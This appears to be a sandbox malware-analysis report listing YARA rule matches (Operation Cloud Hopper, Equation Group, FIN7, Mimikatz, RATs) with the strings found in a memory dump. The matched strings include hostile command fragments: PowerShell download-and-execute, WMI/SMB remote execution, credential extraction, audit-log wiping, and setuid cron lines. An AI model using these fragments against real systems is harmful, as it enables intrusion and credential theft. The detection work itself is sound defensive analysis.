- 0x37214:$op2: 83 E8 14 78 CF C1 E0 06 8B F8 8B C3 8A 08 84 C9
- 0x3722a:$op3: 3B FB 7D 3F 8A 4D 14 8D 45 14 84 C9 74 1B 8A 14
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_3 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x373c1:$s6: operator ""
- 0x377c8:$s6: operator ""
- 0x37f98:$s6: operator ""
- 0x36ef4:$s7: zok]\\\ZZYYY666564444
- 0x373d2:$s7: zok]\\\ZZYYY666564444
- 0x37fcb:$s7: zok]\\\ZZYYY666564444
- 0x3b2df:$s7: zok]\\\ZZYYY666564444
- 0x373ed:$s11: InvokeMainViaCRT
- 0x377d9:$s11: InvokeMainViaCRT
- 0x37403:$s12: .?AVAES@@
- 0x377ef:$s12: .?AVAES@@
- 0x37412:$op1: B6 4C 06 F5 32 CF 88 4C 06 05 0F B6 4C 06 F9 32
- 0x37428:$op2: 06 FC EB 03 8A 5E F0 85 C0 74 05 8A 0C 06 EB 03
- 0x3743e:$op3: 7E F8 85 C0 74 06 8A 74 06 08 EB 03 8A 76 FC 85
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_Malware_5 | Detects malware from Operation Cloud Hopper | Florian Roth | - 0x3797f:$x1: CWINDOWSSYSTEMROOT
- 0x37996:$x2: YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK
- 0x379bb:$x3: NJK_JK_SED_PNJHGFUUGIOO_PIY
- 0x379db:$x4: c_VDGQBUl}YSB_C_VDlqSDYFU
- 0x379f9:$s7: FALLINLOVE
- 0x37a09:$op1: 83 EC 60 8D 4C 24 00 E8 6F FF FF FF 8D 4C 24 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | OpCloudHopper_WmiDLL_inMemory | Malware related to Operation Cloud Hopper - Page 25 | Florian Roth | - 0x35ac9:$s1: wmi.dll 2>&1
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | VBS_WMIExec_Tool_Apr17_1 | Tools related to Operation Cloud Hopper | Florian Roth | - 0x36bb9:$x1: strNetUse = "cmd.exe /c net use \\" & host
- 0x36be8:$x2: localcmd = "cmd.exe /c " & command
- 0x36c10:$x3: & " > " & TempFile & " 2>&1" '2>&1 err
- 0x36c3c:$x4: strExec = "cmd.exe /c " & cmd & " >> " & resultfile & " 2>&1" '2>&1 err
- 0x36c89:$x5: TempFile = objShell.ExpandEnvironmentStrings("%TEMP%") & "\wmi.dll"
- 0x36cd1:$a1: WMIEXEC ERROR: Command ->
- 0x36cf0:$a2: WMIEXEC : Command result will output to
- 0x36d1c:$a3: WMIEXEC : Target ->
- 0x36d34:$a4: WMIEXEC : Login -> OK
- 0x36d4e:$a5: WMIEXEC : Process created. PID:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | RevengeRAT_Sep17 | Detects RevengeRAT malware | Florian Roth | - 0x78a4:$x1: Nuclear Explosion.g.resources
- 0x78f3:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41
- 0x7920:$x5: \RevengeRAT\
- 0x7931:$x6: Revenge-RAT client has been successfully installed.
- 0x7969:$x7: Nuclear Explosion.exe
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x38676:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x3869d:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x386e0:$s3: MimiPenguin Results:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | POSHSPY_Malware | Detects | Florian Roth | - 0xfb6e:$x1: function sWP($cN, $pN, $aK, $aI)
- 0xfb93:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2
- 0xfbbf:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',
- 0xfc0f:$x4: $cPairKey = "BwIAAACkAABSU0EyAAQAAAEAA
- 0xfc3a:$x5: $exeRes = exePldRoutine
- 0xfc56:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0xf6e3:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0xf75a:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FIN7_Backdoor_Aug17 | Detects Word Dropper from Proofpoint FIN7 Report | Florian Roth | - 0xb6f9:$x1: wscript.exe //b /e:jscript C:\Users\
- 0xb722:$x2: wscript.exe /b /e:jscript C:\Users\
- 0xb74a:$x3: schtasks /Create /f /tn "GoogleUpdateTaskMachineSystem" /tr "wscript.exe
- 0xb797:$x4: schtasks /Delete /F /TN ""GoogleUpdateTaskMachineCore
- 0xb7d1:$x5: schtasks /Delete /F /TN "GoogleUpdateTaskMachineCore
- 0xb80a:$x6: wscript.exe //b /e:jscript %TMP%\debug.txt
- 0xb839:$s1: /?page=wait
- 0xb849:$a1: autoit3.exe
- 0xb859:$a2: dumpcap.exe
- 0xb869:$a3: tshark.exe
- 0xb878:$a4: prl_cc.exe
- 0xb887:$v1: vmware
- 0xb892:$v2: PCI\\VEN_80EE&DEV_CAFE
- 0xb8ad:$v3: VMWVMCIHOSTDEV
- 0xb8c0:$c1: apowershell
- 0xb8d0:$c2: wpowershell
- 0xb8e0:$c3: get_passwords
- 0xb8f2:$c4: kill_process
- 0xb903:$c5: get_screen
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x15b04:$s2: -t, --threads=N number of miner threads (default: number of processors)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_SMBExec | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x1644d:$x1: Invoke-SMBExec -Target
- 0x16468:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
- 0x164d5:$s1: Write-Output "Command executed with service $SMB_service on $Target"
- 0x1651e:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- 0x16581:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x16739:$x1: Invoke-WMIExec
- 0x1674d:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x167bd:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x167e7:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x16813:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x16867:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x16a45:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0x16a78:$s2: Write-Output "$Target did not respond"
- 0x16aa3:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x16c9e:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0x16ce3:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0x16d4e:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x38c96:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x38cca:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x38d35:$x4: -Download -RemoteFile C:\passwords.txt
- 0x38d60:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x38d99:$x6: Invoke-WMImplant
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | FVEY_ShadowBrokers_Jan17_Screen_Strings | Detects strings derived from the ShadowBroker's leak of Windows tools/exploits | Florian Roth | - 0x2191f:$x3: PeddleCheap
- 0x2738b:$x3: PeddleCheap
- 0x1fe76:$d4: Mcl_NtMemory
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x3882a:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x3874c:$x2: Invoke-OSiRis
- 0x3889d:$x2: Invoke-OSiRis
- 0x388af:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x388f5:$x4: Device Guard Bypass Command Execution
- 0x3891f:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x3882a:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x3895f:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | MAL_KHRAT_script | Rule derived from KHRAT script but can match on other malicious scripts as well | Florian Roth | - 0x7d16:$x1: CreateObject("WScript.Shell").Run "schtasks /create /sc MINUTE /tn
- 0x7d5d:$x2: CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication
- 0x7dbc:$x3: <registration progid="ff010f" classid="{e934870c-b429-4d0d-acf1-eef338b92c4b}" >
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_powershell | Detects powershell script used in Operation Wilted Tulip | Florian Roth | - 0xd20b:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_Windows_UM_Task | Detects a Windows scheduled task as used in Operation Wilted Tulip | Florian Roth | - 0xda7c:$c1: svchost64.swp",checkUpdate
- 0xda9b:$c2: svchost64.swp,checkUpdate
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_WindowsTask | Detects hack tool used in Operation Wilted Tulip - Windows Tasks | Florian Roth | - 0xdc59:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | WiltedTulip_ReflectiveLoader | Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Florian Roth | - 0xe978:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x17ef3:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0xe9ae:$x2: %d is an x86 process (can't inject x64 content)
- 0x17f29:$x2: %d is an x86 process (can't inject x64 content)
- 0xe9e2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x17ea5:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0xea30:$x4: Failed to impersonate token from %d (%u)
- 0xea5d:$x5: Failed to impersonate logged on user %d (%u)
- 0xea8e:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
- 0x17f96:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x368ab:$s1: bpywintypes27.dll
- 0x368c1:$s2: hZFtPC
- 0xba3c:$s3: impacket
- 0xba4e:$s3: impacket
- 0xba61:$s3: impacket
- 0x3437e:$s3: impacket
- 0x3444a:$s3: impacket
- 0x344e8:$s3: impacket
- 0x34645:$s3: impacket
- 0x34715:$s3: impacket
- 0x347ae:$s3: impacket
- 0x34906:$s3: impacket
- 0x34a82:$s3: impacket
- 0x34b47:$s3: impacket
- 0x34bf2:$s3: impacket
- 0x34cbb:$s3: impacket
- 0x34d59:$s3: impacket
- 0x34e11:$s3: impacket
- 0x34ebb:$s3: impacket
- 0x35021:$s3: impacket
- 0x350e4:$s3: impacket
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Auditcleaner | Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner | Florian Roth | - 0x2d06a:$x1: > /var/log/audit/audit.log; rm -f .
- 0x2d092:$x2: Pastables to run on target:
- 0x2d0b2:$x3: cp /var/log/audit/audit.log .tmp
- 0x2d0d7:$l1: Here is the first good cron session from
- 0x2d104:$l2: No need to clean LOGIN lines.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_elgingamble | Equation Group hack tool leaked by ShadowBrokers- file elgingamble | Florian Roth | - 0x2f213:$x1: * * * * * root chown root %s; chmod 4755 %s; %s
- 0x2f247:$x2: [-] kernel not vulnerable
- 0x3174a:$x2: [-] kernel not vulnerable
- 0x31958:$x2: [-] kernel not vulnerable
- 0x31b42:$x2: [-] kernel not vulnerable
- 0x2f265:$x3: [-] failed to spawn shell: %s
- 0x2f287:$x4: -s shell Use shell instead of %s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_cmsd | Equation Group hack tool leaked by ShadowBrokers- file cmsd | Florian Roth | - 0x2f42b:$x1: usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]
- 0x2f46a:$x2: error: not vulnerable
- 0x2f484:$s1: port=%d connected!
- 0x2f49c:$s2: xxx.XXXXXX
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_ebbshave | Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5 | Florian Roth | - 0x2f62b:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s
- 0x2f669:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772
- 0x2f6a7:$s3: version 1 - Start with option #18 first, if it fails then try this option
- 0x2f6f5:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_eggbasket | Equation Group hack tool leaked by ShadowBrokers- file eggbasket | Florian Roth | - 0x2f8c8:$x1: # Building Shellcode into exploit.
- 0x2f8ef:$x2: %s -w /index.html -v 3.5 -t 10 -c "/usr/openwin/bin/xterm -d 555.1.2.2:0&" -d 10.0.0.1 -p 80
- 0x2f951:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_sambal | Equation Group hack tool leaked by ShadowBrokers- file sambal | Florian Roth | - 0x2fd16:$s1: + Bruteforce mode.
- 0x2fd2d:$s3: + Host is not running samba!
- 0x2fd4e:$s4: + connecting back to: [%d.%d.%d.%d:45295]
- 0x2fd7c:$s5: + Exploit failed, try -b to bruteforce.
- 0x2fda8:$s7: Usage: %s [-bBcCdfprsStv] [host]
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_envisioncollision | Equation Group hack tool leaked by ShadowBrokers- file envisioncollision | Florian Roth | - 0x30168:$x1: mysql \$D --host=\$H --user=\$U --password=\"\$P\" -e \"select * from \$T
- 0x301b6:$x2: Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\"sleep 500|nc
- 0x30201:$s3: $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- 0x30247:$s4: $url = $host . "/admin/index.php?adsess=" . $enter . "&app=core&module=applications§ion=hooks&do=install_hook";
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_cmsex | Equation Group hack tool leaked by ShadowBrokers- file cmsex | Florian Roth | - 0x30436:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>)
- 0x30491:$x2: -i target ip address / hostname
- 0x304b6:$x3: Note: Choosing the correct target type is a bit of guesswork.
- 0x304f8:$x4: Solaris rpc.cmsd remote root exploit
- 0x30521:$x5: If one choice fails, you may want to try another.
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_DUL | Equation Group hack tool leaked by ShadowBrokers- file DUL | Florian Roth | - 0x3086d:$x1: ?Usage: %s <shellcode> <output_file>
- 0x30896:$x2: Here is the decoder+(encoded-decoder)+payload
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_slugger2 | Equation Group hack tool leaked by ShadowBrokers- file slugger2 | Florian Roth | - 0x30a45:$x1: usage: %s hostip port cmd [printer_name]
- 0x30a72:$x2: command must be less than 61 chars
- 0x30a99:$s1: __rw_read_waiting
- 0x306da:$s2: completed.1
- 0x30aaf:$s2: completed.1
- 0x30abf:$s3: __mutexkind
- 0x30acf:$s4: __rw_pshared
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_jackpop | Equation Group hack tool leaked by ShadowBrokers- file jackpop | Florian Roth | - 0x30f27:$x1: %x:%d --> %x:%d %d bytes
- 0x30f45:$s1: client: can't bind to local address, are you root?
- 0x30f7c:$s2: Unable to register port
- 0x30f98:$s3: Could not resolve destination
- 0x30fba:$s4: raw troubles
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_epoxyresin_v1_0_0 | Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1 | Florian Roth | - 0x2f247:$x1: [-] kernel not vulnerable
- 0x3174a:$x1: [-] kernel not vulnerable
- 0x31958:$x1: [-] kernel not vulnerable
- 0x31b42:$x1: [-] kernel not vulnerable
- 0x31768:$s1: .tmp.%d.XXXXXX
- 0x3177b:$s2: [-] couldn't create temp file
- 0x3179d:$s3: /boot/System.map-%s
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_estesfox | Equation Group hack tool leaked by ShadowBrokers- file estesfox | Florian Roth | - 0x326c1:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_elatedmonkey_1_0_1_1 | Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh | Florian Roth | - 0x32894:$x3: Usage: $0 ( -s IP PORT | CMD )
- 0x328b7:$s5: os.execl("/bin/sh", "/bin/sh", "-c", "$CMD")
- 0x328e9:$s13: PHP_SCRIPT="$HOME/public_html/info$X.php"
- 0x32918:$s15: cat > /dev/tcp/127.0.0.1/80 <<END
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ftshell_ftshell_v3_10_3_0 | Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 | Florian Roth | - 0x32ced:$s1: set uRemoteUploadCommand "[exec cat /current/.ourtn-ftshell-upcommand]"
- 0x32d39:$s2: send "\[ \"\$BASH\" = \"/bin/bash\" -o \"\$SHELL\" = \"/bin/bash\" \] &&
- 0x32d86:$s3: system rm -f /current/tmp/ftshell.latest
- 0x32db3:$s4: # ftshell -- File Transfer Shell
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__scanner_scanner_v2_1_2 | Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2 | Florian Roth | - 0x1fe16:$s1: Welcome to the network scanning tool
- 0x32f79:$s1: Welcome to the network scanning tool
- 0x32fa2:$s2: Scanning port %d
- 0x32fb7:$s3: /current/down/cmdout/scans
- 0x32fd6:$s4: Scan for SSH version
- 0x32fef:$s5: program vers proto port service
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ghost_sparc_ghost_x86_3 | Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86 | Florian Roth | - 0x331b7:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target
- 0x331f9:$x2: Sending shellcode as part of an open command...
- 0x3322d:$x3: cmdshellcode
- 0x3323e:$x4: You will not be able to run the shellcode. Exiting...
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__jparsescan_parsescan_5 | Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan | Florian Roth | - 0x3364e:$s1: # default is to dump out all scanned hosts found
- 0x33683:$s2: $bool .= " -r " if (/mibiisa.* -r/);
- 0x336ac:$s3: sadmind is available on two ports, this also works)
- 0x336e4:$s4: -x IP gives \"hostname:# users:load ...\" if positive xwin scan
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__funnelout_v4_1_0_1 | Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl | Florian Roth | - 0x338c8:$s1: header("Set-Cookie: bbsessionhash=" . \$hash . "; path=/; HttpOnly");
- 0x33912:$s2: if ($code =~ /proxyhost/) {
- 0x33932:$s3: \$rk[1] = \$rk[1] - 1;
- 0x3394d:$s4: #existsUser($u) or die "User '$u' does not exist in database.\n";
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__magicjack_v1_1_0_0_client | Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py | Florian Roth | - 0x33b44:$s1: temp = ((left >> 1) ^ right) & 0x55555555
- 0x33b72:$s2: right ^= (temp << 16) & 0xffffffff
- 0x33b9a:$s3: tempresult = ""
- 0x33bae:$s4: num = self.bytes2long(data)
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup__ftshell | Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7 | Florian Roth | - 0x33d63:$s1: if { [string length $uRemoteUploadCommand]
- 0x33d92:$s2: processUpload
- 0x33da4:$s3: global dothisreallyquiet
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_noclient_3_3_2 | Equation Group hack tool set | Florian Roth | - 0x2a590:$x1: 127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning
- 0x2a5e6:$x2: iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;
- 0x2a62f:$x3: noclient: failed to execute %s: %s
- 0x2a656:$x4: sh -c "ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx "
- 0x2a690:$s5: Attempting connection from 0.0.0.0:
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_Eternalromance | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x1e885:$x1: [-] Error: Exploit choice not supported for target OS!!
- 0x1e8c1:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed
- 0x1e90d:$x3: [-] Error: Backdoor not present on target
- 0x1e93b:$x4: *********** TARGET ARCHITECTURE IS X64 ************
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_Gen2 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x1ef09:$s1: [+] Setting password : (NULL)
- 0x1ef2b:$s2: [-] TbBuffCpy() failed!
- 0x1ef47:$s3: [+] SMB negotiation
- 0x1ef5f:$s4: 12345678-1234-ABCD-EF00-0123456789AB
- 0x1ef88:$s5: Value must end with 0000 (2 NULLs)
- 0x1efaf:$s6: [*] Configuring Payload
- 0x1efcb:$s7: [*] Connecting to listener
- 0x1efeb:$op1: B0 42 40 00 89 44 24 30 C7 44 24 34
- 0x1effd:$op2: EB 59 8B 4C 24 10 68 1C 46
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_ntevt | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x20329:$x1: c:\ntevt.pdb
- 0x2033a:$s1: ARASPVU
- 0x20347:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4
- 0x23b10:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4
- 0x2035d:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88
- 0x23b26:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88
- 0x20373:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
- 0x23b3c:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27138:$s1: PQRAPAQSTUVWARASATAUAVAW
- 0x27155:$s2: SQRUWVAWAVAUATASARAQAP
- 0x27170:$s3: iijymqp
- 0x2717c:$s4: AWAVAUATASARAQI
- 0x27190:$s5: WARASATAUAVM
- 0x271a2:$op1: 0C 80 30 02 48 83 C2 01 49 83 E9 01 75 E1 C3 CC
- 0x271b8:$op2: E8 10 66 0D 00 80 66 31 02 48 83 C2 02 49 83 E9
- 0x271ce:$op3: 48 B8 53 A5 E1 41 D4 F1 07 00 48 33
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27571:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename]
- 0x275aa:$x2: Double Feature Target Version
- 0x275cc:$x3: DoubleFeature Process ID
- 0x275ea:$op1: A1 30 21 41 00 89 85 D8 FC FF FF A1 34 21 41 00
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 | Detects EquationGroup Tool - April Leak | Florian Roth | - 0x27b85:$x1: * Listening Post DLL %s() returned error code %d.
- 0x27bbb:$s1: WsaErrorTooManyProcesses
- 0x1e27e:$s2: NtErrorMoreProcessingRequired
- 0x27bd8:$s2: NtErrorMoreProcessingRequired
- 0x1bc81:$s3: Connection closed by remote host (TCP Ack/Fin)
- 0x27bfa:$s3: Connection closed by remote host (TCP Ack/Fin)
- 0x27c2d:$s4: ServerErrorBadNamePassword
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | EquationGroup_scanner_output | Detects output generated by EQGRP scanner.exe | Florian Roth | - 0x1b85d:$s0: # scanning ip
- 0x1fdf7:$s0: # scanning ip
- 0x1b871:$s1: # Scan for windows boxes
- 0x1b88e:$s2: Going into send
- 0x1b8a2:$s3: # Does not work
- 0x1b8b6:$s4: You are the weakest link, goodbye
- 0x1b8dc:$s5: rpc Scan for RPC folks
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_xtremerat_1 | Yara detected Xtreme RAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | JoeSecurity_PupyRAT | Yara detected PupyRAT | Joe Security | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | dragos_crashoverride_moduleStrings | IEC-104 Interaction Module Program Strings | Dragos Inc | - 0x17942:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u
- 0x17933:$s5: iec104.log
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Obfuscated_VBS_April17 | Detects cloaked Mimikatz in VBS obfuscation | Florian Roth | - 0x1b546:$s1: ::::::ExecuteGlobal unescape(unescape(
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Obfuscated_JS_April17 | Detects cloaked Mimikatz in JS obfuscation | Florian Roth | - 0x1b6de:$s1: ";function Main(){for(var
- 0x1b6fd:$s2: =String.fromCharCode(parseInt(
